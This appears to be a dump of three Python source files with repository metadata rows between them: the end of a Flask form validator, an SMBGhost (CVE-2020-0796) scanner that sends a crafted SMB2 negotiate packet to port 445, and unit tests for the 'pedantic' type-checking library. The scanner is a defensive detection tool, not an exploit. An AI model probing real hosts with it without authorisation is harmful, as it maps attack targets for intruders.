        if not form[field].isalpha():
            return False
    return True
# check that the password and its confirmation agree
def matchPassword(form):
    """Return True when the password and its confirmation are identical."""
    return form['password'] == form['cpassword']
@app.route('/process', methods=['POST'])
def form_page():
    """Validate the submitted registration form, flash the outcome,
    and always redirect back to the index page."""
    form = request.form
    # Validators run in order; the first failure determines the message.
    if not checkForValuelength(form):
        flash("All fileds are required and password must be 8 or more characater")
    elif not validNamefileds(form):
        flash("Name and last name must not contain numbers")
    elif not EMAIL_REGEX.match(form['email']):
        flash("Invalid Email address")
    elif not matchPassword(form):
        flash("Password do not match")
    else:
        flash("Form sccessfully submitted")
    return redirect('/')
@app.route('/')
def result_page():
    """Send the visitor back to the index page."""
    destination = '/'
    return redirect(destination)
app.run(debug=True)
| 28.245614
| 82
| 0.636646
| 0
| 0
| 0
| 0
| 779
| 0.483851
| 0
| 0
| 475
| 0.295031
|
369f3934be836b3619a596d326601ac157eae3f4
| 2,344
|
py
|
Python
|
eternalghost.py
|
awareseven/eternalghosttest
|
989dafac06b72af21e1cd7103c92ec6b399e5133
|
[
"MIT"
] | 2
|
2020-03-15T11:39:18.000Z
|
2021-12-05T20:38:48.000Z
|
eternalghost.py
|
awareseven/eternalghosttest
|
989dafac06b72af21e1cd7103c92ec6b399e5133
|
[
"MIT"
] | null | null | null |
eternalghost.py
|
awareseven/eternalghosttest
|
989dafac06b72af21e1cd7103c92ec6b399e5133
|
[
"MIT"
] | 2
|
2020-03-18T20:21:37.000Z
|
2020-10-13T09:19:14.000Z
|
import socket
import struct
import sys
# ASCII-art banner shown at startup.
banner = """
_ _ _ _
| | | | | | | |
___| |_ ___ _ __ _ __ __ _| | __ _| |__ ___ ___| |_
/ _ \ __/ _ \ '__| '_ \ / _` | |/ _` | '_ \ / _ \/ __| __|
| __/ || __/ | | | | | (_| | | (_| | | | | (_) \__ \ |_
\___|\__\___|_| |_| |_|\__,_|_|\__, |_| |_|\___/|___/\__|
__/ |
|___/
\t\t\t\t\tby AWARE7 GmbH
"""
print(banner)
# Require exactly one positional argument: the target IP/hostname.
if len(sys.argv) < 2:
    print("Not enough Arguments")
    print("python3 scanner.py <IP-Address>")
    sys.exit()
# Connection-Handle for SMB Handshake
# Pre-built SMB2 NEGOTIATE request advertising dialects up to 3.1.1 with compression,
# used to probe for CVE-2020-0796 (SMBGhost).
pkt = b'\x00\x00\x00\xc0\xfeSMB@\x00\x00\x00\x00\x00\x00\x00\x00\x00\x1f\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00$\x00\x08\x00\x01\x00\x00\x00\x7f\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00x\x00\x00\x00\x02\x00\x00\x00\x02\x02\x10\x02"\x02$\x02\x00\x03\x02\x03\x10\x03\x11\x03\x00\x00\x00\x00\x01\x00&\x00\x00\x00\x00\x00\x01\x00 \x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x03\x00\n\x00\x00\x00\x00\x00\x01\x00\x00\x00\x01\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00'
# Generate a Socket
sock = socket.socket(socket.AF_INET)
sock.settimeout(3)
# Get Hostname
hostname = sys.argv[1]
# Connect to Host
print("Scanning System: {}\r\n".format(hostname))
sock.connect(( hostname, 445 ))
# Send Handshake
sock.send(pkt)
# Receive Handshake
# First 4 bytes are the NetBIOS session header: big-endian length of the SMB payload.
nb, = struct.unpack(">I", sock.recv(4))
res = sock.recv(nb)
# Check if SMB Version 3_11 is used
# Offset 68 in the NEGOTIATE response holds the negotiated dialect (0x0311 = SMB 3.1.1).
if not res[68:70] == b"\x11\x03":
    print("\tYour System {} doesn't use the latest SMB Version. This is insecure as well but you are not effected by CVE-2020-0796".format(hostname))
    sys.exit(1)
# Check if uses Compression
# Offset 70 holds the compression capability flag negotiated by the server.
if not res[70:72] == b"\x02\x00":
    print("\tYour System {} is not vulnearble to CVE-2020-0796".format(hostname))
    sys.exit(1)
print("\tYour System {} is vulnearble to CVE-2020-0796".format(hostname))
sys.exit(1)
| 45.076923
| 761
| 0.593857
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1,818
| 0.775597
|
369f8e2a1f4297f6ea89787a4d4e52bb3722aa03
| 63,998
|
py
|
Python
|
pedantic/tests/tests_pedantic.py
|
LostInDarkMath/Pedantic-python-decorators
|
32ed54c9593e80f63c0499093cb07847d8a5e1df
|
[
"Apache-2.0"
] | null | null | null |
pedantic/tests/tests_pedantic.py
|
LostInDarkMath/Pedantic-python-decorators
|
32ed54c9593e80f63c0499093cb07847d8a5e1df
|
[
"Apache-2.0"
] | null | null | null |
pedantic/tests/tests_pedantic.py
|
LostInDarkMath/Pedantic-python-decorators
|
32ed54c9593e80f63c0499093cb07847d8a5e1df
|
[
"Apache-2.0"
] | null | null | null |
import os.path
import sys
import types
import typing
import unittest
from datetime import datetime, date
from functools import wraps
from io import BytesIO, StringIO
from typing import List, Tuple, Callable, Any, Optional, Union, Dict, Set, FrozenSet, NewType, TypeVar, Sequence, \
AbstractSet, Iterator, NamedTuple, Collection, Type, Generator, Generic, BinaryIO, TextIO, Iterable, Container, \
NoReturn, ClassVar
from enum import Enum, IntEnum
from pedantic import pedantic_class
from pedantic.exceptions import PedanticTypeCheckException, PedanticException, PedanticCallWithArgsException, \
PedanticTypeVarMismatchException
from pedantic.decorators.fn_deco_pedantic import pedantic
TEST_FILE = 'test.txt'
class Parent:
    """Minimal base class used as a type-hierarchy fixture in the tests below."""
    pass
class Child(Parent):
    """Fixture subclass of Parent; ``method`` exists only to provide a signature."""
    def method(self, a: int):
        pass
class TestDecoratorRequireKwargsAndTypeCheck(unittest.TestCase):
def tearDown(self) -> None:
if os.path.isfile(TEST_FILE):
os.remove(TEST_FILE)
def test_no_kwargs(self):
@pedantic
def calc(n: int, m: int, i: int) -> int:
return n + m + i
with self.assertRaises(expected_exception=PedanticCallWithArgsException):
calc(42, 40, 38)
with self.assertRaises(expected_exception=PedanticCallWithArgsException):
calc(42, m=40, i=38)
calc(n=42, m=40, i=38)
def test_nested_type_hints_1(self):
@pedantic
def calc(n: int) -> List[List[float]]:
return [0.0 * n]
with self.assertRaises(expected_exception=PedanticTypeCheckException):
calc(n=42)
def test_nested_type_hints_1_corrected(self):
@pedantic
def calc(n: int) -> List[List[float]]:
return [[0.0 * n]]
calc(n=42)
def test_nested_type_hints_2(self):
"""Problem here: int != float"""
@pedantic
def calc(n: int) -> List[Tuple[float, str]]:
return [(n, str(n))]
with self.assertRaises(expected_exception=PedanticTypeCheckException):
calc(n=42)
def test_nested_type_hints_2_corrected(self):
@pedantic
def calc(n: int) -> List[Tuple[int, str]]:
return [(n, str(n))]
@pedantic
def calc_2(n: float) -> List[Tuple[float, str]]:
return [(n, str(n))]
calc(n=42)
calc_2(n=42.0)
def test_nested_type_hints_3(self):
"""Problem here: inner function actually returns Tuple[int, str]"""
@pedantic
def calc(n: int) -> Callable[[int, float], Tuple[float, str]]:
@pedantic
def f(x: int, y: float) -> Tuple[float, str]:
return n * x, str(y)
return f
with self.assertRaises(expected_exception=PedanticTypeCheckException):
calc(n=42)(x=3, y=3.14)
def test_nested_type_hints_3_corrected(self):
@pedantic
def calc(n: int) -> Callable[[int, float], Tuple[int, str]]:
@pedantic
def f(x: int, y: float) -> Tuple[int, str]:
return n * x, str(y)
return f
calc(n=42)(x=3, y=3.14)
def test_nested_type_hints_4(self):
"""Problem here: return type is actually float"""
@pedantic
def calc(n: List[List[float]]) -> int:
return n[0][0]
with self.assertRaises(expected_exception=PedanticTypeCheckException):
calc(n=[[42.0]])
def test_nested_type_hints_corrected(self):
@pedantic
def calc(n: List[List[float]]) -> int:
return int(n[0][0])
calc(n=[[42.0]])
def test_nested_type_hints_5(self):
"""Problem here: Tuple[float, str] != Tuple[float, float]"""
@pedantic
def calc(n: int) -> Callable[[int, float], Tuple[float, str]]:
@pedantic
def f(x: int, y: float) -> Tuple[float, float]:
return n * float(x), y
return f
with self.assertRaises(expected_exception=PedanticTypeCheckException):
calc(n=42)
def test_nested_type_hints_5_corrected(self):
@pedantic
def calc(n: int) -> Callable[[int, float], Tuple[float, float]]:
@pedantic
def f(x: int, y: float) -> Tuple[float, float]:
return n * float(x), y
return f
calc(n=42)
def test_missing_type_hint_1(self):
"""Problem here: type hint for n missed"""
@pedantic
def calc(n) -> float:
return 42.0 * n
with self.assertRaises(expected_exception=PedanticTypeCheckException):
calc(n=42)
def test_missing_type_hint_1_corrected(self):
@pedantic
def calc(n: int) -> float:
return 42.0 * n
calc(n=42)
def test_missing_type_hint_2(self):
"""Problem here: Return type annotation missed"""
@pedantic
def calc(n: int):
return 'Hi' + str(n)
with self.assertRaises(expected_exception=PedanticTypeCheckException):
calc(n=42)
def test_missing_type_hint_2_corrected(self):
@pedantic
def calc(n: int) -> str:
return 'Hi' + str(n)
calc(n=42)
def test_missing_type_hint_3(self):
"""Problem here: type hint for i missed"""
@pedantic
def calc(n: int, m: int, i) -> int:
return n + m + i
with self.assertRaises(expected_exception=PedanticTypeCheckException):
calc(n=42, m=40, i=38)
def test_missing_type_hint_3_corrected(self):
@pedantic
def calc(n: int, m: int, i: int) -> int:
return n + m + i
calc(n=42, m=40, i=38)
def test_all_ok_2(self):
@pedantic
def calc(n: int, m: int, i: int) -> str:
return str(n + m + i)
calc(n=42, m=40, i=38)
def test_all_ok_3(self):
@pedantic
def calc(n: int, m: int, i: int) -> None:
str(n + m + i)
calc(n=42, m=40, i=38)
def test_all_ok_4(self):
@pedantic
def calc(n: int) -> List[List[int]]:
return [[n]]
calc(n=42)
def test_all_ok_5(self):
@pedantic
def calc(n: int) -> List[Tuple[float, str]]:
return [(float(n), str(n))]
calc(n=42)
def test_all_ok_6(self):
@pedantic
def calc(n: int) -> Callable[[int, float], Tuple[float, str]]:
@pedantic
def f(x: int, y: float) -> Tuple[float, str]:
return n * float(x), str(y)
return f
calc(n=42)(x=72, y=3.14)
def test_all_ok_7(self):
@pedantic
def calc(n: List[List[float]]) -> Any:
return n[0][0]
calc(n=[[42.0]])
def test_all_ok_8(self):
@pedantic
def calc(n: int) -> Callable[[int, float], Tuple[float, str]]:
@pedantic
def f(x: int, y: float) -> Tuple[float, str]:
return n * float(x), str(y)
return f
calc(n=42)(x=3, y=3.14)
def test_wrong_type_hint_1(self):
"""Problem here: str != int"""
@pedantic
def calc(n: int, m: int, i: int) -> str:
return n + m + i
with self.assertRaises(expected_exception=PedanticTypeCheckException):
calc(n=42, m=40, i=38)
def test_wrong_type_hint_1_corrected(self):
@pedantic
def calc(n: int, m: int, i: int) -> str:
return str(n + m + i)
calc(n=42, m=40, i=38)
def test_wrong_type_hint_2(self):
"""Problem here: str != int"""
@pedantic
def calc(n: int, m: int, i: str) -> int:
return n + m + i
with self.assertRaises(expected_exception=PedanticTypeCheckException):
calc(n=42, m=40, i=38)
def test_wrong_type_hint_2_corrected(self):
@pedantic
def calc(n: int, m: int, i: str) -> int:
return n + m + int(i)
calc(n=42, m=40, i='38')
def test_wrong_type_hint_3(self):
"""Problem here: None != int"""
@pedantic
def calc(n: int, m: int, i: int) -> None:
return n + m + i
with self.assertRaises(expected_exception=PedanticTypeCheckException):
calc(n=42, m=40, i=38)
def test_wrong_type_hint_corrected(self):
@pedantic
def calc(n: int, m: int, i: int) -> None:
print(n + m + i)
calc(n=42, m=40, i=38)
def test_wrong_type_hint_4(self):
"""Problem here: None != int"""
@pedantic
def calc(n: int, m: int, i: int) -> int:
print(n + m + i)
with self.assertRaises(expected_exception=PedanticTypeCheckException):
calc(n=42, m=40, i=38)
def test_wrong_type_hint_4_corrected(self):
@pedantic
def calc(n: int, m: int, i: int) -> int:
return n + m + i
calc(n=42, m=40, i=38)
def test_none_1(self):
"""Problem here: None is not accepted"""
@pedantic
def calc(n: int, m: int, i: int) -> int:
return n + m + i
with self.assertRaises(expected_exception=PedanticTypeCheckException):
calc(n=42, m=40, i=None)
def test_none_2(self):
@pedantic
def calc(n: int, m: int, i: Optional[int]) -> int:
return n + m + i if i is not None else n + m
calc(n=42, m=40, i=None)
def test_none_3(self):
@pedantic
def calc(n: int, m: int, i: Union[int, None]) -> int:
return n + m + i if i is not None else n + m
calc(n=42, m=40, i=None)
def test_none_4(self):
"""Problem here: function may return None"""
@pedantic
def calc(n: int, m: int, i: Union[int, None]) -> int:
return n + m + i if i is not None else None
calc(n=42, m=40, i=42)
with self.assertRaises(expected_exception=PedanticTypeCheckException):
calc(n=42, m=40, i=None)
def test_none_5(self):
@pedantic
def calc(n: int, m: int, i: Union[int, None]) -> Optional[int]:
return n + m + i if i is not None else None
calc(n=42, m=40, i=None)
def test_inheritance_1(self):
class MyClassA:
pass
class MyClassB(MyClassA):
pass
@pedantic
def calc(a: MyClassA) -> str:
return str(a)
calc(a=MyClassA())
calc(a=MyClassB())
def test_inheritance_2(self):
"""Problem here: A is not a subtype of B"""
class MyClassA:
pass
class MyClassB(MyClassA):
pass
@pedantic
def calc(a: MyClassB) -> str:
return str(a)
calc(a=MyClassB())
with self.assertRaises(expected_exception=PedanticTypeCheckException):
calc(a=MyClassA())
def test_instance_method_1(self):
class MyClassA:
@pedantic
def calc(self, i: int) -> str:
return str(i)
a = MyClassA()
a.calc(i=42)
def test_instance_method_2(self):
"""Problem here: 'i' has no type annotation"""
class MyClassA:
@pedantic
def calc(self, i) -> str:
return str(i)
a = MyClassA()
with self.assertRaises(expected_exception=PedanticTypeCheckException):
a.calc(i=42)
def test_instance_method_2_corrected(self):
class MyClassA:
@pedantic
def calc(self, i: int) -> str:
return str(i)
a = MyClassA()
a.calc(i=42)
def test_instance_method_int_is_not_float(self):
class MyClassA:
@pedantic
def calc(self, i: float) -> str:
return str(i)
a = MyClassA()
with self.assertRaises(expected_exception=PedanticTypeCheckException):
a.calc(i=42)
def test_instance_method_3_corrected(self):
class MyClassA:
@pedantic
def calc(self, i: float) -> str:
return str(i)
a = MyClassA()
a.calc(i=42.0)
def test_instance_method_no_kwargs(self):
class MyClassA:
@pedantic
def calc(self, i: int) -> str:
return str(i)
a = MyClassA()
with self.assertRaises(expected_exception=PedanticCallWithArgsException):
a.calc(42)
def test_instance_method_5(self):
"""Problem here: instance methods is not called with kwargs"""
class MyClassA:
@pedantic
def calc(self, i: int) -> str:
return str(i)
a = MyClassA()
a.calc(i=42)
def test_lambda_1(self):
@pedantic
def calc(i: float) -> Callable[[float], str]:
return lambda x: str(x * i)
calc(i=42.0)(10.0)
def test_lambda_3(self):
@pedantic
def calc(i: float) -> Callable[[float], str]:
def res(x: float) -> str:
return str(x * i)
return res
calc(i=42.0)(10.0)
def test_lambda_int_is_not_float(self):
@pedantic
def calc(i: float) -> Callable[[float], str]:
def res(x: int) -> str:
return str(x * i)
return res
with self.assertRaises(expected_exception=PedanticTypeCheckException):
calc(i=42.0)(x=10)
def test_lambda_4_almost_corrected(self):
"""Problem here: float != str"""
@pedantic
def calc(i: float) -> Callable[[float], str]:
@pedantic
def res(x: int) -> str:
return str(x * i)
return res
with self.assertRaises(expected_exception=PedanticTypeCheckException):
calc(i=42.0)(x=10)
def test_lambda_4_almost_corrected_2(self):
@pedantic
def calc(i: float) -> Callable[[int], str]:
@pedantic
def res(x: int) -> str:
return str(x * i)
return res
calc(i=42.0)(x=10)
def test_lambda_5(self):
"""Problem here: float != int"""
@pedantic
def calc(i: float) -> Callable[[float], str]:
@pedantic
def res(x: float) -> str:
return str(x * i)
return res
with self.assertRaises(expected_exception=PedanticTypeCheckException):
calc(i=42.0)(x=10)
def test_lambda_corrected(self):
@pedantic
def calc(i: float) -> Callable[[float], str]:
@pedantic
def res(x: float) -> str:
return str(x * i)
return res
calc(i=42.0)(x=10.0)
def test_tuple_without_type_args(self):
@pedantic
def calc(i: Tuple) -> str:
return str(i)
with self.assertRaises(expected_exception=PedanticTypeCheckException):
calc(i=(42.0, 43, 'hi'))
def test_tuple_without_args_corrected(self):
@pedantic
def calc(i: Tuple[Any, ...]) -> str:
return str(i)
calc(i=(42.0, 43, 'hi'))
def test_callable_without_type_args(self):
@pedantic
def calc(i: Callable) -> str:
return str(i(' you'))
with self.assertRaises(expected_exception=PedanticTypeCheckException):
calc(i=lambda x: (42.0, 43, 'hi', x))
def test_callable_without_args_correct_with_lambdas(self):
@pedantic
def calc(i: Callable[[Any], Tuple[Any, ...]]) -> str:
return str(i(x=' you'))
calc(i=lambda x: (42.0, 43, 'hi', x))
def test_callable_without_args_corrected(self):
@pedantic
def calc(i: Callable[[Any], Tuple[Any, ...]]) -> str:
return str(i(x=' you'))
@pedantic
def arg(x: Any) -> Tuple[Any, ...]:
return 42.0, 43, 'hi', x
calc(i=arg)
def test_list_without_args(self):
@pedantic
def calc(i: List) -> Any:
return [i]
with self.assertRaises(expected_exception=PedanticTypeCheckException):
calc(i=[42.0, 43, 'hi'])
def test_list_without_args_corrected(self):
@pedantic
def calc(i: List[Any]) -> List[List[Any]]:
return [i]
calc(i=[42.0, 43, 'hi'])
def test_ellipsis_in_callable_1(self):
@pedantic
def calc(i: Callable[..., int]) -> int:
return i()
@pedantic
def call() -> int:
return 42
calc(i=call)
def test_ellipsis_in_callable_2(self):
@pedantic
def calc(i: Callable[..., int]) -> int:
return i(x=3.14, y=5)
@pedantic
def call(x: float, y: int) -> int:
return 42
calc(i=call)
def test_ellipsis_in_callable_3(self):
"""Problem here: call to "call" misses one argument"""
@pedantic
def calc(i: Callable[..., int]) -> int:
return i(x=3.14)
@pedantic
def call(x: float, y: int) -> int:
return 42
with self.assertRaises(expected_exception=PedanticException):
calc(i=call)
def test_optional_args_1(self):
@pedantic
def calc(a: int, b: int = 42) -> int:
return a + b
calc(a=2)
def test_optional_args_2(self):
@pedantic
def calc(a: int = 3, b: int = 42, c: float = 5.0) -> float:
return a + b + c
calc()
calc(a=1)
calc(b=1)
calc(c=1.0)
calc(a=1, b=1)
calc(a=1, c=1.0)
calc(b=1, c=1.0)
calc(a=1, b=1, c=1.0)
def test_optional_args_3(self):
"""Problem here: optional argument c: 5 is not a float"""
@pedantic
def calc(a: int = 3, b: int = 42, c: float = 5) -> float:
return a + b + c
with self.assertRaises(expected_exception=PedanticTypeCheckException):
calc()
def test_optional_args_3_corrected(self):
@pedantic
def calc(a: int = 3, b: int = 42, c: float = 5.0) -> float:
return a + b + c
calc()
def test_optional_args_4(self):
class MyClass:
@pedantic
def foo(self, a: int, b: Optional[int] = 1) -> int:
return a + b
my_class = MyClass()
my_class.foo(a=10)
def test_optional_args_5(self):
@pedantic
def calc(d: Optional[Dict[int, int]] = None) -> Optional[int]:
if d is None:
return None
return sum(d.keys())
calc(d=None)
calc()
calc(d={42: 3})
with self.assertRaises(expected_exception=PedanticTypeCheckException):
calc(d={42: 3.14})
def test_optional_args_6(self):
""""Problem here: str != int"""
@pedantic
def calc(d: int = 42) -> int:
return int(d)
calc(d=99999)
with self.assertRaises(expected_exception=PedanticTypeCheckException):
calc(d='999999')
def test_enum_1(self):
"""Problem here: Type hint for 'a' should be MyEnum instead of MyEnum.GAMMA"""
class MyEnum(Enum):
ALPHA = 'startEvent'
BETA = 'task'
GAMMA = 'sequenceFlow'
class MyClass:
@pedantic
def operation(self, a: MyEnum.GAMMA) -> None:
print(a)
m = MyClass()
with self.assertRaises(expected_exception=PedanticTypeCheckException):
m.operation(a=MyEnum.GAMMA)
def test_enum_1_corrected(self):
class MyEnum(Enum):
ALPHA = 'startEvent'
BETA = 'task'
GAMMA = 'sequenceFlow'
@pedantic
def operation(a: MyEnum) -> None:
print(a)
operation(a=MyEnum.GAMMA)
def test_sloppy_types_dict(self):
@pedantic
def operation(d: dict) -> int:
return len(d.keys())
with self.assertRaises(expected_exception=PedanticTypeCheckException):
operation(d={1: 1, 2: 2})
def test_sloppy_types_dict_almost_corrected_no_type_args(self):
@pedantic
def operation(d: Dict) -> int:
return len(d.keys())
with self.assertRaises(expected_exception=PedanticTypeCheckException):
operation(d={1: 1, 2: 2})
def test_sloppy_types_dict_corrected(self):
@pedantic
def operation(d: Dict[int, int]) -> int:
return len(d.keys())
operation(d={1: 1, 2: 2})
def test_sloppy_types_list(self):
@pedantic
def operation(d: list) -> int:
return len(d)
with self.assertRaises(expected_exception=PedanticTypeCheckException):
operation(d=[1, 2, 3, 4])
def test_sloppy_types_list_almost_corrected_no_type_args(self):
@pedantic
def operation(d: List) -> int:
return len(d)
with self.assertRaises(expected_exception=PedanticTypeCheckException):
operation(d=[1, 2, 3, 4])
def test_sloppy_types_list_corrected(self):
@pedantic
def operation(d: List[int]) -> int:
return len(d)
operation(d=[1, 2, 3, 4])
def test_sloppy_types_tuple(self):
@pedantic
def operation(d: tuple) -> int:
return len(d)
with self.assertRaises(expected_exception=PedanticTypeCheckException):
operation(d=(1, 2, 3))
def test_sloppy_types_tuple_almost_corrected_no_type_args(self):
@pedantic
def operation(d: Tuple) -> int:
return len(d)
with self.assertRaises(expected_exception=PedanticTypeCheckException):
operation(d=(1, 2, 3))
def test_sloppy_types_tuple_corrected(self):
@pedantic
def operation(d: Tuple[int, int, int]) -> int:
return len(d)
operation(d=(1, 2, 3))
def test_sloppy_types_set(self):
@pedantic
def operation(d: set) -> int:
return len(d)
with self.assertRaises(expected_exception=PedanticTypeCheckException):
operation(d={1, 2, 3})
def test_sloppy_types_set_almost_corrected_to_type_args(self):
@pedantic
def operation(d: Set) -> int:
return len(d)
with self.assertRaises(expected_exception=PedanticTypeCheckException):
operation(d={1, 2, 3})
def test_sloppy_types_set_corrected(self):
@pedantic
def operation(d: Set[int]) -> int:
return len(d)
operation(d={1, 2, 3})
def test_sloppy_types_frozenset(self):
@pedantic
def operation(d: frozenset) -> int:
return len(d)
with self.assertRaises(expected_exception=PedanticTypeCheckException):
operation(d=frozenset({1, 2, 3}))
def test_sloppy_types_frozenset_almost_corrected_no_type_args(self):
@pedantic
def operation(d: FrozenSet) -> int:
return len(d)
with self.assertRaises(expected_exception=PedanticTypeCheckException):
operation(d=frozenset({1, 2, 3}))
def test_sloppy_types_frozenset_corrected(self):
@pedantic
def operation(d: FrozenSet[int]) -> int:
return len(d)
operation(d=frozenset({1, 2, 3}))
def test_type_list_but_got_tuple(self):
@pedantic
def calc(ls: List[Any]) -> int:
return len(ls)
with self.assertRaises(expected_exception=PedanticTypeCheckException):
calc(ls=(1, 2, 3))
def test_type_list_corrected(self):
@pedantic
def calc(ls: Tuple[Any, ...]) -> int:
return len(ls)
calc(ls=(1, 2, 3))
def test_any(self):
@pedantic
def calc(ls: List[Any]) -> Dict[int, Any]:
return {i: ls[i] for i in range(0, len(ls))}
calc(ls=[1, 2, 3])
calc(ls=[1.11, 2.0, 3.0])
calc(ls=['1', '2', '3'])
calc(ls=[10.5, '2', (3, 4, 5)])
def test_aliases(self):
Vector = List[float]
@pedantic
def scale(scalar: float, vector: Vector) -> Vector:
return [scalar * num for num in vector]
scale(scalar=2.0, vector=[1.0, -4.2, 5.4])
def test_new_type(self):
UserId = NewType('UserId', int)
@pedantic
def get_user_name(user_id: UserId) -> str:
return str(user_id)
some_id = UserId(524313)
get_user_name(user_id=some_id)
# the following would be desirable but impossible to check at runtime:
# with self.assertRaises(expected_exception=AssertionError):
# get_user_name(user_id=-1)
def test_list_of_new_type(self):
UserId = NewType('UserId', int)
@pedantic
def get_user_name(user_ids: List[UserId]) -> str:
return str(user_ids)
get_user_name(user_ids=[UserId(524313), UserId(42)])
with self.assertRaises(expected_exception=PedanticTypeCheckException):
get_user_name(user_ids=[UserId(524313), UserId(42), 430.0])
def test_callable_no_args(self):
@pedantic
def f(g: Callable[[], str]) -> str:
return g()
@pedantic
def greetings() -> str:
return 'hello world'
f(g=greetings)
def test_type_var(self):
T = TypeVar('T')
@pedantic
def first(ls: List[T]) -> T:
return ls[0]
first(ls=[1, 2, 3])
def test_type_var_wrong(self):
T = TypeVar('T')
@pedantic
def first(ls: List[T]) -> T:
return str(ls[0])
with self.assertRaises(expected_exception=PedanticTypeVarMismatchException):
first(ls=[1, 2, 3])
def test_type_var_wrong_sequence(self):
T = TypeVar('T')
@pedantic
def first(ls: Sequence[T]) -> T:
return str(ls[0])
with self.assertRaises(expected_exception=PedanticTypeVarMismatchException):
first(ls=[1, 2, 3])
def test_double_pedantic(self):
@pedantic
@pedantic
def f(x: int, y: float) -> Tuple[float, str]:
return float(x), str(y)
f(x=5, y=3.14)
with self.assertRaises(expected_exception=PedanticTypeCheckException):
f(x=5.0, y=3.14)
with self.assertRaises(expected_exception=PedanticCallWithArgsException):
f(5, 3.14)
def test_args_kwargs(self):
@pedantic
def some_method(a: int = 0, b: float = 0.0) -> float:
return a * b
@pedantic
def wrapper_method(*args: Union[int, float], **kwargs: Union[int, float]) -> float:
return some_method(*args, **kwargs)
some_method()
with self.assertRaises(expected_exception=PedanticCallWithArgsException):
some_method(3, 3.0)
some_method(a=3, b=3.0)
wrapper_method()
with self.assertRaises(expected_exception=PedanticCallWithArgsException):
wrapper_method(3, 3.0)
wrapper_method(a=3, b=3.0)
def test_args_kwargs_no_type_hint(self):
@pedantic
def method_no_type_hint(*args, **kwargs) -> None:
print(args)
print(kwargs)
with self.assertRaises(expected_exception=PedanticTypeCheckException):
method_no_type_hint(a=3, b=3.0)
with self.assertRaises(expected_exception=PedanticTypeCheckException):
method_no_type_hint()
def test_args_kwargs_wrong_type_hint(self):
"""See: https://www.python.org/dev/peps/pep-0484/#arbitrary-argument-lists-and-default-argument-values"""
@pedantic
def wrapper_method(*args: str, **kwargs: str) -> None:
print(args)
print(kwargs)
wrapper_method()
wrapper_method('hi', 'you', ':)')
wrapper_method(a='hi', b='you', c=':)')
with self.assertRaises(expected_exception=PedanticTypeCheckException):
wrapper_method('hi', 'you', ':)', 7)
with self.assertRaises(expected_exception=PedanticTypeCheckException):
wrapper_method(3, 3.0)
with self.assertRaises(expected_exception=PedanticTypeCheckException):
wrapper_method(a=3, b=3.0)
def test_additional_kwargs(self):
@pedantic
def some_method(a: int, b: float = 0.0, **kwargs: int) -> float:
return sum([a, b])
some_method(a=5)
some_method(a=5, b=0.1)
some_method(a=5, b=0.1, c=4)
some_method(a=5, b=0.1, c=4, d=5, e=6)
with self.assertRaises(expected_exception=PedanticTypeCheckException):
some_method(a=5, b=0.1, c=4, d=5.0, e=6)
with self.assertRaises(expected_exception=PedanticTypeCheckException):
some_method(a=5.0, b=0.1, c=4, d=5, e=6)
with self.assertRaises(expected_exception=PedanticTypeCheckException):
some_method(a=5, b=0, c=4, d=5, e=6)
def test_args_kwargs_different_types(self):
@pedantic
def foo(*args: str, **kwds: int) -> None:
print(args)
print(kwds)
foo('a', 'b', 'c')
foo(x=1, y=2)
foo('', z=0)
def test_pedantic_on_class(self):
with self.assertRaises(expected_exception=PedanticTypeCheckException):
@pedantic
class MyClass:
pass
MyClass()
def test_is_subtype_tuple(self):
with self.assertRaises(expected_exception=PedanticTypeCheckException):
@pedantic
def foo() -> Callable[[Tuple[float, str]], Tuple[int]]:
def bar(a: Tuple[float]) -> Tuple[int]:
return len(a[1]) + int(a[0]),
return bar
foo()
def test_is_subtype_tuple_corrected(self):
@pedantic
def foo() -> Callable[[Tuple[float, str]], Tuple[int]]:
def bar(a: Tuple[float, str]) -> Tuple[int]:
return len(a[1]) + int(a[0]),
return bar
foo()
def test_forward_ref(self):
class Conversation:
pass
@pedantic
def get_conversations() -> List['Conversation']:
return [Conversation(), Conversation()]
get_conversations()
def test_alternative_list_type_hint(self):
@pedantic
def _is_digit_in_int(digit: [int], num: int) -> bool:
num_str = str(num)
for i in num_str:
if int(i) == digit:
return True
return False
with self.assertRaises(expected_exception=PedanticTypeCheckException):
_is_digit_in_int(digit=4, num=42)
def test_callable_with_union_return(self):
class MyClass:
pass
@pedantic
def admin_required(func: Callable[..., Union[str, MyClass]]) -> Callable[..., Union[str, MyClass]]:
@wraps(func)
def decorated_function(*args, **kwargs):
return func(*args, **kwargs)
return decorated_function
@admin_required
@pedantic
def get_server_info() -> str:
return 'info'
get_server_info()
def test_pedantic(self):
@pedantic
def foo(a: int, b: str) -> str:
return 'abc'
self.assertEqual('abc', foo(a=4, b='abc'))
def test_pedantic_always(self):
@pedantic
def foo(a: int, b: str) -> str:
return 'abc'
self.assertEqual('abc', foo(a=4, b='abc'))
def test_pedantic_arguments_fail(self):
@pedantic
def foo(a: int, b: str) -> str:
return 'abc'
with self.assertRaises(expected_exception=PedanticTypeCheckException):
foo(a=4, b=5)
def test_pedantic_return_type_fail(self):
@pedantic
def foo(a: int, b: str) -> str:
return 6
with self.assertRaises(expected_exception=PedanticTypeCheckException):
foo(a=4, b='abc')
def test_return_type_none(self):
@pedantic
def foo() -> None:
return 'a'
with self.assertRaises(expected_exception=PedanticTypeCheckException):
foo()
def test_marco(self):
@pedantic_class
class A:
def __init__(self, val: int) -> None:
self.val = val
def __eq__(self, other: 'A') -> bool: # other: A and all subclasses
return self.val == other.val
@pedantic_class
class B(A):
def __init__(self, val: int) -> None:
super().__init__(val=val)
@pedantic_class
class C(A):
def __init__(self, val: int) -> None:
super().__init__(val=val)
a = A(val=42)
b = B(val=42)
c = C(val=42)
assert a == b # works
assert a == c # works
assert b == c # error
def test_date_datetime(self):
@pedantic
def foo(a: datetime, b: date) -> None:
pass
foo(a=datetime(1995, 2, 5), b=date(1987, 8, 7))
foo(a=datetime(1995, 2, 5), b=datetime(1987, 8, 7))
